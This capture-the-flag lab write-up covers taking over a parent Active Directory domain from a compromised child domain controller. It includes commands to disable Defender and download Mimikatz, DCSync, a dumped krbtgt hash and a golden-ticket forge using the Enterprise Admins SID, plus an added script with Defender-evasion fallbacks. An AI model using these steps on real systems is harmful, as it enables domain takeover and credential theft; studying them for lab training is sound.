Full Compromise of Parent Domain


Last updated 2 years ago


Used Tools

Python web server

PowerShell

Mimikatz

Summary

From the attack machine we stage Mimikatz and the other tools on the VPN server with a Python web server and serve them from there to CORPDC, the child domain controller we already control and from which the attack on the parent domain is run. First we disable Defender's real-time monitoring on CORPDC. We then try to pull the Administrator hash of the parent domain from ROOTDC with lsadump::dcsync, authenticated as our CORP Domain Admin. This fails: DCSync is a directory replication request, and being Domain Admin in the child domain does not grant the replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) on the parent's naming context. Instead we gather the inputs for a golden ticket (the child domain's krbtgt hash, the child domain SID and the SID of the parent's Enterprise Admins group) and forge a TGT for Administrator that carries the Enterprise Admins SID as an extra SID. With that ticket we can reach the C$ share of ROOTDC and drop the flags that prove full compromise of the parent domain. Creating a user on ROOTDC with PsExec and SMBExec follows in the next section.

Investigation

Running a Python web server on the attack machine to serve the tools into the network.

Downloading the tools from the attack machine to the VPN machine.

Running a Python web server on the VPN machine to serve the tools to CORPDC.

First, in a PowerShell session running as administrator on CORPDC, we disable Defender's real-time monitoring with the following command and fetch Mimikatz from the VPN server. Note that on a host with Tamper Protection enabled this cmdlet succeeds silently but has no effect, so it is worth checking the resulting state before downloading anything.

Set-MpPreference -DisableRealtimeMonitoring $true
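The staging step above, written out as an added example (this is not the writeup's own code): it disables Defender's real-time monitoring on CORPDC, confirms the change actually took effect, and fetches Mimikatz from the VPN host. The address 10.200.0.1, the file list and the destination folder are assumptions; the web server on the VPN host is assumed to be `python3 -m http.server 80` started in the directory that holds the tools.

```powershell
# Added example, not part of the original writeup.
# Assumptions: elevated PowerShell on CORPDC; the VPN host (address below is a
# placeholder) serves the tool directory with `python3 -m http.server 80`.
$VpnHost = '10.200.0.1'                  # assumption: VPN server address
$Dest    = 'C:\Windows\Temp\tools'       # assumption: staging folder on CORPDC
$Files   = 'mimikatz.exe', 'mimilib.dll' # assumption: files present on the VPN host

# Stop Defender from scanning (and quarantining) what we are about to download.
Set-MpPreference -DisableRealtimeMonitoring $true

# With Tamper Protection enforced the cmdlet returns without error but changes
# nothing, so read back the effective state before fetching anything.
$status = Get-MpComputerStatus
if ($status.RealTimeProtectionEnabled) {
    throw 'Real-time protection is still on; Tamper Protection is probably enforced.'
}

New-Item -ItemType Directory -Path $Dest -Force | Out-Null
foreach ($f in $Files) {
    $uri = "http://$VpnHost/$f"
    Invoke-WebRequest -Uri $uri -OutFile (Join-Path $Dest $f) -UseBasicParsing
    Write-Host "fetched $uri -> $Dest\$f"
}

# Sanity check: Mimikatz starts and prints its version before we rely on it.
& (Join-Path $Dest 'mimikatz.exe') 'version' 'exit'
```

If the throw fires, the download would be quarantined on arrival; at that point the realistic options are an exclusion path (Add-MpPreference -ExclusionPath) if Tamper Protection allows it, or running the tools from memory rather than disk.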

Next, we run Mimikatz, check our privileges and try to DCSync the built-in Administrator account of the parent domain from ROOTDC. Mimikatz reports that the username is not unique: every domain in the forest has its own built-in Administrator account (RID 500), so the bare name is ambiguous.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator

To name the account unambiguously, we look up the SID of the parent domain's built-in Administrator on ROOTDC (its RID is 500, so it is the parent domain SID followed by -500) and repeat the DCSync with the SID as the /user value.

The request is denied again. The problem is not the identifier but the rights: the replication permissions on thereserve.loc are held by the parent domain's own privileged principals (its Administrators group and its domain controllers), not by Domain Admins of the child domain, so our CORP account cannot replicate the parent's secrets no matter how the target is named.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500

With DCSync against the parent ruled out, we abuse the parent-child trust instead: a golden ticket forged with the child domain's krbtgt key, carrying the parent's Enterprise Admins SID as an extra SID (/sids), is honoured by the parent because SID filtering is not enforced on intra-forest trusts.

The following information has to be gathered to craft the golden ticket.

  • The FQDN of the child domain whose krbtgt key we hold

    • corp.thereserve.loc

  • The SID of the child domain. Mimikatz appends the RID given by /id (500 by default) to this value to form the SID of the impersonated account in the forged PAC, so it should be the domain SID (S-1-5-21-x-y-z), not the SID of an object inside the domain. The writeup takes the SID of the CORPDC computer object, which ends in that object's own RID (-1009); the domain SID proper is the same value without the trailing -1009, which is what the DomainSID property of Get-ADDomain returns. The ticket below was forged with the computer object's SID and still worked, since the access comes from the Enterprise Admins extra SID.

    • S-1-5-21-170228521-1485475711-3199862024-1009 (as used in the writeup)

    Get SID of CORPDC

    PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC"
  • The SID of the Enterprise Admins group of the parent domain, which goes into the forged TGT as an extra SID. Its RID is always 519, so it is the parent domain SID followed by -519; the group exists only in the forest root, so the query has to be sent to ROOTDC.

    • S-1-5-21-1255581842-1300659601-3764024703-519

    Get SID of Enterprise Admins from ROOTDC

    PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc
  • The username of the account we want to impersonate

    • Administrator

  • The NTLM hash of the child domain's krbtgt account, dumped from CORPDC with DCSync (this succeeds because we are Domain Admin in corp)

    • 0c757a3445acb94a654554f3ac529ede

    mimikatz # lsadump::dcsync /user:corp\krbtgt

The template from the Exploiting AD room that the command below follows:

# From https://tryhackme.com/room/exploitingad
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt

With that information we forge the golden ticket and inject it into the current session (/ptt), impersonating Administrator with Enterprise Admins rights.

kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

With the injected TGT we can reach the C$ share of ROOTDC: the parent's KDC accepts the Enterprise Admins extra SID, so the session is treated as an enterprise administrator.

There we place our proof of compromise in the required folders. Creating a new user on ROOTDC and adding it to Domain Admins and Enterprise Admins logically belongs to this section as well, but for a clearer structure it is covered in the next section as part of compromising the BANK domain.

Flag-15: Foothold on Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-16: Administrative access to Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt

See also: Exploiting Domain Trusts (TryHackMe, Exploiting Active Directory room)

https://tryhackme.com/room/exploitingad